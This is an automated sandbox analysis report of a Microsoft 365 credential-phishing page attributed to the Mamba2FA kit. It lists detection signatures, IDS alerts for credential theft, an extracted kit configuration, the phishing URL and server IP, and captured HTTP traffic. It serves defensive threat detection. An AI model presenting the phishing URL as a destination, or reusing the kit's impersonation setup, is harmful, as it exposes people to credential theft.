Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N

Overview

General Information

Sample URL:https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N
Analysis ID:1540729
Infos:

Detection

HTMLPhisher, Mamba2FA
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found
Invalid T&C link found
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1896,i,5167075357235610977,1307917269125286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"sv": "o365_1_nom", "rand": "d1l6NTg=", "uid": "USER16102024U11101647"}
SourceRuleDescriptionAuthorStrings
1.1.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
    1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.0.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
        1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-24T03:40:23.094479+020020563161Successful Credential Theft Detected192.168.2.1649707157.230.134.73443TCP
          2024-10-24T03:40:24.916128+020020563161Successful Credential Theft Detected192.168.2.1649710157.230.134.73443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-24T03:40:22.054254+020020566432Possible Social Engineering Attempted192.168.2.1649703157.230.134.73443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
          Source: 1.0.pages.csvMalware Configuration Extractor: Mamba2FA {"sv": "o365_1_nom", "rand": "d1l6NTg=", "uid": "USER16102024U11101647"}

          Phishing

          barindex
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NLLM: Score: 7 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'chiquitzinbb.com' does not match the legitimate domain for Microsoft., The domain name 'chiquitzinbb.com' does not contain any recognizable elements related to Microsoft., The presence of input fields for 'Email, phone or Skype' is typical for Microsoft services, but the domain mismatch is a strong indicator of phishing., The domain 'chiquitzinbb.com' appears unrelated to Microsoft and could be a phishing attempt. DOM: 1.1.pages.csv
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NMatcher: Found strong image similarity, brand: MICROSOFT
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NMatcher: Template: microsoft matched
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Number of links: 0
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Title: Authenticating ... does not match URL
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Invalid link: Forgot password?
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Invalid link: Terms of use
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Invalid link: Privacy & cookies
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Invalid link: Terms of use
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: Invalid link: Privacy & cookies
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: <input type="password" .../> found
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: No favicon
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: No favicon
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: No <meta name="author".. found
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: No <meta name="author".. found
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: No <meta name="copyright".. found
          Source: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NHTTP Parser: No <meta name="copyright".. found
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49738 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49739 version: TLS 1.2

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.16:49710 -> 157.230.134.73:443
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.16:49707 -> 157.230.134.73:443
          Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.16:49703 -> 157.230.134.73:443
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: global trafficHTTP traffic detected: GET /o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N HTTP/1.1Host: chiquitzinbb.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /o/jsnom.js HTTP/1.1Host: chiquitzinbb.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cid=113903e38d58c1cba4bae1499e6181af
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://chiquitzinbb.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://chiquitzinbb.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /o/jsnom.js HTTP/1.1Host: chiquitzinbb.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cid=113903e38d58c1cba4bae1499e6181af
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chiquitzinbb.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chiquitzinbb.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chiquitzinbb.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: chiquitzinbb.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chiquitzinbb.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chiquitzinbb.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chiquitzinbb.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chiquitzinbb.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: chiquitzinbb.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zGHyCofktCX+BTC&MD=nWdxdK88 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zGHyCofktCX+BTC&MD=nWdxdK88 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficDNS traffic detected: DNS query: chiquitzinbb.com
          Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
          Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
          Source: unknownHTTP traffic detected: POST /o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N HTTP/1.1Host: chiquitzinbb.comConnection: keep-aliveContent-Length: 139064Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://chiquitzinbb.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cid=113903e38d58c1cba4bae1499e6181af
          Source: chromecache_66.1.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
          Source: chromecache_79.1.dr, chromecache_66.1.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
          Source: chromecache_79.1.dr, chromecache_66.1.drString found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc
          Source: chromecache_79.1.dr, chromecache_66.1.drString found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
          Source: chromecache_79.1.dr, chromecache_66.1.drString found in binary or memory: https://google.com
          Source: chromecache_79.1.dr, chromecache_66.1.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
          Source: chromecache_66.1.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
